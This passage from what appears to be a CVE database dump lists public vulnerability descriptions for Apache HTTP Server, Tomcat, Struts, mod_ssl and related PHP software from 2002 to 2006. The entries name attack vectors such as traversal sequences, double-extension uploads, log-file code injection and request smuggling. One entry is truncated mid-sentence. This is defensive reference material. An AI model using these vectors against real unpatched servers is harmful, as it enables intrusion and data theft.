5917| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5918| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5919| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5920| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5921| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5922| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5923| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5924| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5925| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5926| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5927| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5928| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5929| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5930| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5931| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5932| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5933| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5934| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5935| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5936| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5937| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5938| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5939| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5940| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5941| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5942| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5943| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5944| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5945| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5946| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5947| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5948| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
5949| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5950| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5951| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5952| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5953| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5954| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5955| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
5956| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5957| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5958| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
5959| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
5960| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
5961| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
5962| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
5963| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
5964| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
5965| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
5966| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
5967| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
5968| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
5969| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5970| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5971| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5972| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
5973| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
5974| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
5975| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
5976| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
5977| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
5978| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
5979| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
5980| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
5981| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
5982| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
5983| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
5984| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
5985| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
5986| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
5987| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5988| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5989| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
5990| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
5991| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
5992| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
5993| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
5994| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
5995| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
5996| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
5997| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
5998| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
5999| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
6000| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
6001| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
6002| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
6003| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
6004| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
6005| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
6006| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
6007| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
6008| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
6009| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
6010| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
6011| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
6012| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
6013| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
6014| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6015| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
6016| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
6017| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
6018| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
6019| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
6020| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
6021| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
6022| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
6023| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
6024| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
6025| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
6026| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
6027| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
6028| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
6029| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
6030| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
6031| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
6032| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
6033| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
6034| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
6035| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
6036| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
6037| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
6038| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
6039| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
6040| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
6041| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
6042| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
6043| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
6044| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
6045| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
6046| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
6047| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
6048| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
